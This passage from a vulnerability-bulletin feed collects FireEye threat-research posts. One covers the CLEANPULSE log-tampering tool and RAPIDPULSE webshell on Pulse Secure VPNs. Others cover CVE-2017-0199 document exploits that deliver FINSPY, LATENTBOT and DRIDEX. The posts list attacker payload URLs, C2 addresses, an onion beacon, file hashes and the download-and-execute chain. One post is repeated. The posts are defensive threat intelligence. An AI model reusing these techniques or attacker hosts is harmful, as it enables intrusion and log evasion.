prevent certain log events from occurring. The utility inserts two strings from the command line into the target process and patches code to conditionally circumvent a function call in the original executable.\n\nFile Name\n\n| \n\nFile Type\n\n| \n\nSize\n\n| \n\nCompile Time \n \n---|---|---|--- \n \ndsrlog\n\n| \n\nELF.X86\n\n| \n\n13332\n\n| \n \nThe utility expects to be run from the command line as follows:\n\ndrslog <pid> <code2_string> <code3_string> <command>\n\nWhere <pid> is the pid process ID to patch in memory, <code2_string> and <code3_string> are two strings to write into the target process, and <command> is either 'e' or 'E' for installation or 'u' or 'U' for uninstallation.\n\nDuring installation (using the 'e' or 'E' <command>), the <code2_string> <code3_string> command line strings are written to the target process at hard-coded memory addresses, a small amount of code is written, and a jump instruction to the code snippet is patched in memory of the target process. The added code checks whether an argument is equal to either <code2_string> <code3_string> strings, and if, so skips a function call in the target process.\n\nDuring uninstall (using the 'u' or 'U' <command>) the patch jump location is overwritten with what appears to be the original 8 bytes of instructions, and the two additional memory buffers and the code snippet appear to be overwritten with zeros.\n\nThe CLEANPULSE utility is highly specific to a victim environment. It does not contain any validation code when patching (i.e. verifying that code is expected prior to modifying it), and it contains hard-coded addresses to patch.\n\nThe target code to patch appears to be the byte sequence: 89 4C 24 08 FF 52 04. This appears as the last bytes in the patched code, and is the 8-bytes written when the uninstall 'u' command is given.\n\nThese bytes correspond to the following two instructions:\n\n.data:0804B138 89 4C 24 08 mov [esp+8], ecx \n \n--- \n \n.data:0804B13C FF 52 04 call dword ptr [edx+4] \n \nThis byte sequence occurs at the hard-coded patch address the utility expects, dslogserver. Based on status and error messages in nearby functions the executable dslogserver appears to be related to log event handling, and the purpose of the CLEANPULSE utility may be to prevent certain events from being logged.\n\nThere are several un-referenced functions that appear to have been taken from the open source project PUPYRAT. It is likely that the actor re-purposed this open source code, using PUPYRAT as a simple template project.\n\n_RAPIDPULSE_\n\nRAPIDPULSE is a webshell capable of arbitrary file read. As is common with other webshells, RAPIDPULSE exists as a modification to a legitimate Pulse Secure file.\n\nThe webshell modifies the legitimate file's main routine which compares the HTTP query parameter with key name: deviceid to a specific key with value. If the parameter matches, then the sample uses an RC4 key to decrypt HTTP query parameter with key name: hmacTime. This decrypted value is a filename which the sample then opens, reads, RC4 encrypts with the same key, base64 encodes, then writes to stdout. The appliance redirects stdout as the response to HTTP requests. This serves as an encrypted file download for the attacker.\n\n#### Integrity Checker Tool and Other Validation Checks\n\nIn our public report, we noted two code families that manipulate check_integrity.sh, a legitimate script used during a normal system upgrade. This validation script was modified by the actor to exit early so that it would not perform the intended checks.\n\nPer Ivanti, the validation provided by check_integrity.sh is a separate validation feature and not the same as the [Integrity Checker Tool (ICT)](<https://kb.pulsesecure.net/articles/Pulse_Secure_Article/KB44755>) available on their website. They recommend that organizations use the online ICT to confirm that hashes of files on their Pulse Secure devices match Ivanti\u2019s list of known good hashes. Please note that the ICT does not scan the rollback partition.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-05-27T00:00:00", "type": "fireeye", "title": "Re-Checking Your Pulse: Updates on Chinese APT Actors Compromising Pulse Secure VPN Devices", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22893"], "modified": "2021-05-27T00:00:00", "id": "FIREEYE:61901D6D8B7FE74193954DA723EA43FC", "href": "https://www.fireeye.com/blog/threat-research/2021/05/updates-on-chinese-apt-compromising-pulse-secure-vpn-devices.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2017-05-04T21:22:49", "description": "FireEye recently identified a vulnerability \u2013 CVE-2017-0199 \u2013 that allows a malicious actor to download and execute a Visual Basic script containing PowerShell commands when a user opens a Microsoft Office RTF document containing an embedded exploit. We worked with Microsoft and [published the technical details of this vulnerability](<https://www.fireeye.com/blog/threat-research/2017/04/cve-2017-0199-hta-handler.html>) as soon as a patch was made available.\n\nIn this follow-up post, we discuss some of the campaigns we observed leveraging the CVE-2017-0199 zero-day in the days, weeks and months leading up to the patch being released.\n\n#### CVE-2017-0199 Used by Multiple Actors\n\nFireEye assesses with moderate confidence that CVE-2017-0199 was leveraged by financially motivated and nation-state actors prior to its disclosure. Actors leveraging FINSPY and LATENTBOT used the zero-day as early as January and March, and similarities between their implementations suggest they obtained exploit code from a shared source. Recent DRIDEX activity began following a disclosure on April 7, 2017.\n\n#### FINSPY Malware Used to Target Russian-Speaking Victims\n\nAs early as Jan. 25, 2017, lure documents referencing a Russian Ministry of Defense decree and a manual allegedly published in the \"Donetsk People's Republic\" exploited CVE-2017-0199 to deliver FINSPY payloads. Though we have not identified the targets, FINSPY is sold by Gamma Group to multiple nation-state clients, and we assess with moderate confidence that it was being used along with the zero-day to carry out cyber espionage.\n\nThe malicious document, \u0421\u041f\u0423\u0422\u041d\u0418\u041a \u0420\u0410\u0417\u0412\u0415\u0414\u0427\u0418\u041a\u0410.doc (MD5: c10dabb05a38edd8a9a0ddda1c9af10e), is a weaponized version of a widely available military training manual (Figure 1). Notably, this version purports to have been published in the \u201cDonetsk People's Republic,\u201d the name given to territory controlled by anti-Kyiv rebels in Eastern Ukraine.\n\nThe initial malicious document downloaded further payloads, including malware and a decoy document from 95.141.38.110. This site was open indexed to allow recovery of additional lure content, including prikaz.doc (MD5: 0F2B7068ABFF00D01CA7E64589E5AFD9), which claims to be a Russian Ministry of Defense decree approving a forest management plan.\n\nPer a 2015 [report](<https://citizenlab.org/2015/10/mapping-finfishers-continuing-proliferation/>) from CitizenLab, Gamma Group licenses their software to clients and each client uses unique infrastructure, making it likely that the two documents are being used by a single client.\n\nFINSPY malware is sold by Gamma Group, an Anglo-German \u201clawful intercept\u201d company. Gamma Group works on behalf of numerous nation-state clients, limiting insight into the ultimate sponsor of the activity. The FINSPY malware was heavily obfuscated, preventing the extraction of command and control (C2) information.\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/MSFT%200day/Fig1b.png)\n\nFigure 1: FINSPY Lure Purporting to be Russian Military Manual\n\n#### CVE-2017-0199 Used to Distribute LATENTBOT\n\nAs early as March 4, 2017, malicious documents exploiting CVE-2017-0199 were used to deliver the [LATENTBOT malware](<https://www.fireeye.com/blog/threat-research/2015/12/latentbot_trace_me.html>). The malware, which includes credential theft capability, has thus far only been observed by FireEye iSIGHT Intelligence in financially motivated threat activity. Additionally, generic lures used in this most recent campaign are consistent with methods employed by financially motivated actors.\n\nLATENTBOT is a modular and highly obfuscated type of malware first discovered by FireEye iSIGHT intelligence in December 2015. It is capable of a variety of functions, including credential theft, hard drive and data wiping, disabling security software, and remote desktop functionality. Recently, we observed LATENTBOT campaigns using Microsoft Word Intruder (MWI).\n\nThe lure documents distributing LATENTBOT malware used generic social engineering. The documents that were used are shown in Table 1, and all used 217.12.203.90 as a C2 domain.\n\n**File Name**\n\n| \n\n**MD5 Hash** \n \n---|--- \n \nhire_form.doc\n\n| \n\n5ebfd13250dd0408e3de594e419f9e01 \n \n!!!!URGENT!!!!READ!!!.doc\n\n| \n\n1b17ccf5109a9342b59bded31e1ffb18\n\n6e9483edacdc2b6f6ed45c526cf4cf7b \n \nPDP.doc\n\n| \n\n4a81b6ac8aa0f86719a574d7546d563f \n \ndocument.doc\n\n| \n\n65a558e9fe907dc5790e8a592364f64e \n \nTable 1: LATENTBOT Documents\n\nOn April 10, the actors altered their infrastructure to deliver TERDOT payloads instead of LATENTBOT. This TERDOT payload (MD5: e3b600a59eea9b2ea7a0d4e3c45074da) beacons to http://185.77.129.103/SBz1efFx/gt45gh.php, then downloads a Tor client and beacons to sudoofk3wgl2gmxm.onion.\n\n#### FINSPY and LATENTBOT Samples Share Origin\n\nShared artifacts in the FINSPY and LATENTBOT samples suggest the same builder was used to create both, indicating the zero-day exploit was supplied to both criminal and cyber espionage operations from the same source.\n\nMalicious documents used in both campaigns share a last revision time of: 2016-11-27 22:42:00 (Figure 2).\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/MSFT%200day/Fig2a.png)\n\nFigure 2: Revision Time Artifact Shared Between FINSPY and LATENTBOT Samples\n\n#### DRIDEX Spam Follows Recent Disclosure\n\nFollowing a disclosure of specifics related to the zero-day on April 7, 2017, the vulnerability was used in DRIDEX spam campaigns, which continue as of the publication of this blog. We cannot confirm the mechanism through which the actors obtained the exploit. These actors may have leveraged knowledge of the vulnerability gained through the disclosure, or been given access to it when it became clear that patching was imminent.\n\nA spam wave was sent out on April 10, 2017, leveraging a \u201cScan Data\u201d lure. The attached document leveraged CVE-2017-0199 to install DRIDEX on the victim\u2019s computer.\n\n#### Outlook and Implications\n\nThough only one FINSPY user has been observed leveraging this zero-day exploit, the historic scope of FINSPY, a capability used by several nation states, suggests other customers had access to it. Additionally, this incident exposes the global nature of cyber threats and the value of worldwide perspective \u2013 a cyber espionage incident targeting Russians can provide an opportunity to learn about and interdict crime against English speakers elsewhere.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-04-12T11:00:00", "type": "fireeye", "title": "CVE-2017-0199 Used as Zero Day to Distribute FINSPY Espionage Malware and LATENTBOT Cyber Crime Malware", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0199"], "modified": "2017-04-12T11:00:00", "id": "FIREEYE:ABF21A18BEF0ABDDD461684446C0A772", "href": "https://www.fireeye.com/blog/threat-research/2017/04/cve-2017-0199_useda.html", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T00:18:21", "description": "FireEye recently detected malicious Microsoft Office RTF documents that leverage CVE-2017-0199, a previously undisclosed vulnerability. This vulnerability allows a malicious actor to download and execute a Visual Basic script containing PowerShell commands when a user opens a document containing an embedded exploit. FireEye has observed Office documents exploiting CVE-2017-0199 that download and execute malware payloads from different well-known malware families.\n\nFireEye shared the details of the vulnerability with Microsoft and has been coordinating public disclosure timed with the release of a patch by Microsoft to address the vulnerability, which can be found [here.](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0199>)\n\nThe vulnerability bypassed most mitigations prior to patch availability; however, FireEye email and network products detected the malicious documents. FireEye recommends that Microsoft Office users apply the [patch from Microsoft](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0199>).\n\n#### Attack Scenario\n\nThe attack occurs in the following manner:\n\n 1. A threat actor emails a Microsoft Word document to a targeted user with an embedded OLE2 embedded link object\n 2. When the user opens the document, winword.exe issues a HTTP request to a remote server to retrieve a malicious HTA file\n 3. The file returned by the server is a fake RTF file with an embedded malicious script\n 4. Winword.exe looks up the file handler for application/hta through a COM object, which causes the Microsoft HTA application (mshta.exe) to load and execute the malicious script\n\nIn the two documents that FireEye observed prior to the [initial blog](<https://www.fireeye.com/blog/threat-research/2017/04/acknowledgement_ofa.html>) acknowledging these attacks, malicious scripts terminated the winword.exe processes, downloaded additional payloads, and loaded decoy documents. The original winword.exe process was terminated to conceal a user prompt generated by the OLE2link. Figure 1 shows this prompt.\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/MSFT%200day/Fig1.png)\n\nFigure 1: User prompt hidden by the Visual Basic script\n\n#### Document 1 - (MD5: 5ebfd13250dd0408e3de594e419f9e01)\n\nThe first malicious document identified by FireEye had three stages. An embedded OLE2 link object causes winword.exe to reach out to the following URL to download the stage one malicious HTA file:\n\nhttp[:]//46.102.152[.]129/template.doc\n\nOnce downloaded, the malicious HTA file is processed by the \u201capplication/hta\u201d handler. The highlighted line in Figure 2 shows the first download occurring, followed by the additional malicious payloads.\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/MSFT%200day/Fig2.png)\n\nFigure 2: Live attack scenario\n\nOnce downloaded, the template file was stored in the user\u2019s temporary internet files with the name template[?].hta, where [?] is determined at run time.\n\n#### The Logic Bug\n\nMshta.exe is responsible for handling the Content-Type \u201capplication/hta,\u201d parsing the content, and executing the script. Figure 3 shows winword.exe querying registry value of CLSID for the \u201capplication/hta\u201d handler.\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/MSFT%200day/Fig3.png)\n\nFigure 3: Winword query registry value\n\nWinword.exe makes a request to the DCOMLaunch service, which in turn causes the svchost.exe process hosting DCOMLaunch to execute mshta.exe. Mshta.exe then executes the script embedded in the malicious HTA document. Figure 4 shows the deobfuscated VBScript from the first stage download.\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/MSFT%200day/Fig4.png)\n\nFigure 4: First document, stage one VBScript\n\nThe script shown in Figure 4 performs the following malicious actions:\n\n 1. Terminates the winword.exe process with taskkill.exe to hide the prompt shown in Figure 1.\n 2. Downloads a VBScript file from http[:]//www.modani[.]com/media/wysiwyg/ww.vbs and saving it to %appdata%\\Microsoft\\Windows\\maintenance.vbs\n 3. Downloads a decoy document from http[:]//www.modani[.]com/media/wysiwyg/questions.doc and saving it to %temp%\\document.doc\n 4. Cleans up the Word Resiliency keys for Word versions 15.0 and 16.0 so that Microsoft Word will restart normally\n 5. Executes the malicious stage two VBScript: %appdata%\\Microsoft\\Windows\\maintenance.vbs\n 6. Opens the decoy document, %temp%\\document.doc, to hide the malicious activity from the user\n\nOnce executed, the downloaded stage two VBScript (ww.vbs/maintenance.vbs) performs the following actions:\n\n 1. Writes an embedded obfuscated script to %TMP%/eoobvfwiglhiliqougukgm.js\n 2. Executes the script\n\nThe obfuscated eoobvfwiglhiliqougukgm.js script performs the following actions when executed:\n\n 1. Attempts to delete itself from the system\n 2. Attempts to download http[:]//www.modani[.]com/media/wysiwyg/wood.exe (at most 44 times), and save the file to %TMP%\\dcihprianeeyirdeuceulx.exe\n 3. Executes %TMP%\\dcihprianeeyirdeuceulx.exe\n\nFigure 5 shows the process execution chain of events.\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/MSFT%200day/Fig5.png)\n\nFigure 5: Process creation events\n\nThe final payload utilized in this malware is a newer variant of the LATENTBOT malware family. Additional details of the updates to this malware follow the Document 2 walkthrough.\n\nMD5\n\n| \n\nSize\n\n| \n\nName\n\n| \n\nDescription \n \n---|---|---|--- \n \n5ebfd13250dd0408e3de594e419f9e01\n\n| \n\n37,523\n\n| \n\nhire_form.doc\n\n| \n\nMalicious document \n \nfb475f0d8c8e9bf1bc360211179d8a28\n\n| \n\n27,429\n\n| \n\ntemplate.doc/template[?].hta\n\n| \n\nMalicious HTA file \n \n984658e34e634d56423797858a711846\n\n| \n\n5,704\n\n| \n\nww.vbs/maintenance.vbs\n\n| \n\nStage two VBScript \n \n73bf8647920eacc7cc377b3602a7ee7a\n\n| \n\n13,386\n\n| \n\nquestions.doc/document.doc\n\n| \n\nDecoy document \n \n11fb87888bbb4dcea4891ab856ac1c52\n\n| \n\n5,292\n\n| \n\neoobvfwiglhiliqougukgm.js\n\n| \n\nMalicious script \n \na1faa23a3ef8cef372f5f74aed82d2de | \n\n388,096\n\n| \n\nwood.exe/ dcihprianeeyirdeuceulx.exe\n\n| \n\nFinal payload \n \n15e51cdbd938545c9af47806984b1667\n\n| \n\n414,720\n\n| \n\nwood.exe/ dcihprianeeyirdeuceulx.exe\n\n| \n\nUpdated final payload \n \nTable 1: First document file metadata\n\n#### The LATENTBOT Payload\n\nThe payload associated with the first document is an updated version of the [LATENTBOT malware family](<https://www.fireeye.com/blog/threat-research/2015/12/latentbot_trace_me.html>). LATENTBOT is a highly-obfuscated BOT that has been in the wild since 2013.\n\nThe newer version of the LATENTBOT has different injection mechanisms for Windows XP (x86) and Windows 7 operating systems:\n\n * **Attrib.exe patching** \u2013 The bot calls Attrib.exe, patches the entry in memory, and inserts a JMP instruction to transfer control to the mapped section. To map the section in the address space of atrrib.exe it uses ZwMapViewOfSection().****\n * **Svchost code Injection** \u2013 Attrib.exe starts the svchost.exe process in suspended mode, creates space, and allocates code by calling ZwMapViewOfSection().\n * **Control transfer** \u2013 It then uses SetThreadContext() to modify the OEP of the primary thread, which will be executed in the remote process to trigger code execution.\n * **Browser injection** \u2013 A similar process is used to inject the final payload into the default web browser with the help of NtMapVIewOfSection().\n\nIn Windows 7 or later operating systems, the bot does not use attrib.exe. Rather, it injects code into svchost.exe followed by launching the default browser with malicious payload by leveraging NtMapViewOfSection().\n\nThis variant then connects to the following command and control (C2) server:\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/MSFT%200day/Code1.png)\n\nUpon successful communication with the C2 server, LATENTBOT generates a beacon. One of the decrypted beacons are as follows with an updated version number of 5015:\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/MSFT%200day/Code2.png)\n\nAt the time of analysis, the C2 server was offline. The bot comes with a highly modular plugin architecture and has been associated with the \u201cPony\u201d campaigns as an infostealer.\n\nAs of April 10, 2017, the malware hosted at www.modani[.]com/media/wysiwyg/wood.exe has been updated and the C2 server has been moved to: 217.12.203[.]100.\n\n#### Document 2 - (MD5: C10DABB05A38EDD8A9A0DDDA1C9AF10E)\n\nThe second malicious document identified by FireEye consisted of two malicious stages. The initial stage reached out to the following URL to download the stage one malicious HTA file:\n\nhttp[:]//95.141.38[.]110/mo/dnr/tmp/template.doc\n\nThis file is downloaded into the user\u2019s temporary internet files directory with the name template[?].hta, where [?] is determined at runtime. Once downloaded, winword.exe utilizes mshta.exe to parse the file. mshta.exe parses through file finding <script> </script> tags and executes the contained script. Figure 6 shows the deobfuscated script.\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/MSFT%200day/Fig6.png)\n\nFigure 6: Second document, first stage VBScript\n\nFigure 6 shows the following malicious actions:\n\n 1. Terminate the winword.exe process with taskkill.exe to hide the prompt shown in Figure 1\n 2. Download an executable from http[:]//95.141.38[.]110/mo/dnr/copy.jpg, saving it to '%appdata%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\winword.exe'\n 3. Download a document from http[:]//95.141.38[.]110/mo/dnr/docu.doc, saving it to %temp%\\document.doc\n 4. Clean up the Word Resiliency keys for Word versions 15.0 and 16.0, so that Microsoft Word will restart normally\n 5. Execute the malicious payload at '%appdata%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\winword.exe'\n 6. Open the decoy document, %temp%\\document.doc, to hide the malicious activity from the user\n\nExamination of the malicious payload revealed that it is a variant of the dropper for what Microsoft calls [WingBird](<http://download.microsoft.com/download/E/B/0/EB0F50CC-989C-4B66-B7F6-68CD3DC90DE3/Microsoft_Security_Intelligence_Report_Volume_21_English.pdf>), which has similar characteristics as FinFisher. The malware is heavily obfuscated with several anti-analysis measures, including a custom VM to slow analysis. A [blog post by \"Artem\"](<https://artemonsecurity.blogspot.com/2017/01/wingbird-rootkit-analysis.html>) covers a payload driver of WingBird. The blog author briefly mentions the protection techniques of the dropper, which match this sample.\n\nMD5\n\n| \n\nSize\n\n| \n\nName\n\n| \n\nDescription \n \n---|---|---|--- \n \nc10dabb05a38edd8a9a0ddda1c9af10e\n\n| \n\n70,269\n\n| \n\n\u0421\u041f\u0423\u0422\u041d\u0418\u041a \u0420\u0410\u0417\u0412\u0415\u0414\u0427\u0418\u041a\u0410.doc\n\n| \n\nMalicious document \n \n9dec125f006f787a3f8ad464d480eed1\n\n| \n\n27,500\n\n| \n\ntemplate.doc\n\n| \n\nMalicious HTA file \n \nacde6fb59ed431000107c8e8ca1b7266\n\n| \n\n1,312,768\n\n| \n\ncopy.jpg/winword.exe\n\n| \n\nFinal payload \n \ne01982913fbc22188b83f5f9fadc1c17\n\n| \n\n6,220,783\n\n| \n\ndocu.doc/document.doc\n\n| \n\nDecoy document \n \nTable 2: Second document metadata\n\n#### Conclusion\n\nFireEye observed CVE-2017-0199, a vulnerability in Microsoft Word that allows an attacker to execute a malicious Visual Basic script. The CVE-2017-0199 vulnerability is a logic bug and bypasses most mitigations. Upon execution of the malicious script, it downloads and executes malicious payloads, as well as displays decoy documents to the user. The two documents achieve execution of their malicious payloads, with one containing LATENTBOT and the other containing WingBird/FinFisher. The malicious document contained only a link to the attacker controlled server, showing the advantage of FireEye\u2019s MVX engine to detect multi-stage attacks. Further campaigns leveraging this attack have been observed prior to patch availability, but are not covered in this blog.\n\nWe recommend that Microsoft Office users apply the [patch](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0199>) as soon as possible.\n\n#### Acknowledgement\n\nThank you to Michael Matonis, Dhanesh Kizhakkinan, Yogesh Londhe, Swapnil Patil, Joshua Triplett, and Tyler Dean from FLARE Team, FireEye Labs Team, and FireEye iSIGHT Intelligence for their contributions to this blog. Thank you as well to everyone who worked with us at the Microsoft Security Response Center (MSRC).\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-04-11T13:30:00", "type": "fireeye", "title": "CVE-2017-0199: In the Wild Attacks Leveraging HTA Handler", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0199"], "modified": "2017-04-11T13:30:00", "id": "FIREEYE:37C92D78C4F9986624FA2FB49CBCB764", "href": "https://www.fireeye.com/blog/threat-research/2017/04/cve-2017-0199-hta-handler.html", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-11-04T00:25:09", "description": "FireEye recently identified a vulnerability \u2013 CVE-2017-0199 \u2013 that allows a malicious actor to download and execute a Visual Basic script containing PowerShell commands when a user opens a Microsoft Office RTF document containing an embedded exploit. We worked with Microsoft and [published the technical details of this vulnerability](<https://www.fireeye.com/blog/threat-research/2017/04/cve-2017-0199-hta-handler.html>) as soon as a patch was made available.\n\nIn this follow-up post, we discuss some of the campaigns we observed leveraging the CVE-2017-0199 zero-day in the days, weeks and months leading up to the patch being released.\n\n#### CVE-2017-0199 Used by Multiple Actors\n\nFireEye assesses with moderate confidence that CVE-2017-0199 was leveraged by financially motivated and nation-state actors prior to its disclosure. Actors leveraging FINSPY and LATENTBOT used the zero-day as early as January and March, and similarities between their implementations suggest they obtained exploit code from a shared source. Recent DRIDEX activity began following a disclosure on April 7, 2017.\n\n#### FINSPY Malware Used to Target Russian-Speaking Victims\n\nAs early as Jan. 25, 2017, lure documents referencing a Russian Ministry of Defense decree and a manual allegedly published in the \"Donetsk People's Republic\" exploited CVE-2017-0199 to deliver FINSPY payloads. Though we have not identified the targets, FINSPY is sold by Gamma Group to multiple nation-state clients, and we assess with moderate confidence that it was being used along with the zero-day to carry out cyber espionage.\n\nThe malicious document, \u0421\u041f\u0423\u0422\u041d\u0418\u041a \u0420\u0410\u0417\u0412\u0415\u0414\u0427\u0418\u041a\u0410.doc (MD5: c10dabb05a38edd8a9a0ddda1c9af10e), is a weaponized version of a widely available military training manual (Figure 1). Notably, this version purports to have been published in the \u201cDonetsk People's Republic,\u201d the name given to territory controlled by anti-Kyiv rebels in Eastern Ukraine.\n\nThe initial malicious document downloaded further payloads, including malware and a decoy document from 95.141.38.110. This site was open indexed to allow recovery of additional lure content, including prikaz.doc (MD5: 0F2B7068ABFF00D01CA7E64589E5AFD9), which claims to be a Russian Ministry of Defense decree approving a forest management plan.\n\nPer a 2015 [report](<https://citizenlab.org/2015/10/mapping-finfishers-continuing-proliferation/>) from CitizenLab, Gamma Group licenses their software to clients and each client uses unique infrastructure, making it likely that the two documents are being used by a single client.\n\nFINSPY malware is sold by Gamma Group, an Anglo-German \u201clawful intercept\u201d company. Gamma Group works on behalf of numerous nation-state clients, limiting insight into the ultimate sponsor of the activity. The FINSPY malware was heavily obfuscated, preventing the extraction of command and control (C2) information.\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/MSFT%200day/Fig1b.png)\n\nFigure 1: FINSPY Lure Purporting to be Russian Military Manual\n\n#### CVE-2017-0199 Used to Distribute LATENTBOT\n\nAs early as March 4, 2017, malicious documents exploiting CVE-2017-0199 were used to deliver the [LATENTBOT malware](<https://www.fireeye.com/blog/threat-research/2015/12/latentbot_trace_me.html>). The malware, which includes credential theft capability, has thus far only been observed by FireEye iSIGHT Intelligence in financially motivated threat activity. Additionally, generic lures used in this most recent campaign are consistent with methods employed by financially motivated actors.\n\nLATENTBOT is a modular and highly obfuscated type of malware first discovered by FireEye iSIGHT intelligence in December 2015. It is capable of a variety of functions, including credential theft, hard drive and data wiping, disabling security software, and remote desktop functionality. Recently, we observed LATENTBOT campaigns using Microsoft Word Intruder (MWI).\n\nThe lure documents distributing LATENTBOT malware used generic social engineering. The documents that were used are shown in Table 1, and all used 217.12.203.90 as a C2 domain.\n\n**File Name**\n\n| \n\n**MD5 Hash** \n \n---|--- \n \nhire_form.doc\n\n| \n\n5ebfd13250dd0408e3de594e419f9e01 \n \n!!!!URGENT!!!!READ!!!.doc\n\n| \n\n1b17ccf5109a9342b59bded31e1ffb18\n\n6e9483edacdc2b6f6ed45c526cf4cf7b \n \nPDP.doc\n\n| \n\n4a81b6ac8aa0f86719a574d7546d563f \n \ndocument.doc\n\n| \n\n65a558e9fe907dc5790e8a592364f64e \n \nTable 1: LATENTBOT Documents\n\nOn April 10, the actors altered their infrastructure to deliver TERDOT payloads instead of LATENTBOT. This TERDOT payload (MD5: e3b600a59eea9b2ea7a0d4e3c45074da) beacons to http://185.77.129.103/SBz1efFx/gt45gh.php, then downloads a Tor client and beacons to sudoofk3wgl2gmxm.onion.\n\n#### FINSPY and LATENTBOT Samples Share Origin\n\nShared artifacts in the FINSPY and LATENTBOT samples suggest the same builder was used to create both, indicating the zero-day exploit was supplied to both criminal and cyber espionage operations from the same source.\n\nMalicious documents used in both campaigns share a last revision time of: 2016-11-27 22:42:00 (Figure 2).\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/MSFT%200day/Fig2a.png)\n\nFigure 2: Revision Time Artifact Shared Between FINSPY and LATENTBOT Samples\n\n#### DRIDEX Spam Follows Recent Disclosure\n\nFollowing a disclosure of specifics related to the zero-day on April 7, 2017, the vulnerability was used in DRIDEX spam campaigns, which continue as of the publication of this blog. We cannot confirm the mechanism through which the actors obtained the exploit. These actors may have leveraged knowledge of the vulnerability gained through the disclosure, or been given access to it when it became clear that patching was imminent.\n\nA spam wave was sent out on April 10, 2017, leveraging a \u201cScan Data\u201d lure. The attached document leveraged CVE-2017-0199 to install DRIDEX on the victim\u2019s computer.\n\n#### Outlook and Implications\n\nThough only one FINSPY user has been observed leveraging this zero-day exploit, the historic scope of FINSPY, a capability used by several nation states, suggests other customers had access to it. Additionally, this incident exposes the global nature of cyber threats and the value of worldwide perspective \u2013 a cyber espionage incident targeting Russians can provide an opportunity to learn about and interdict crime against English speakers elsewhere.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-04-12T15:00:00", "type": 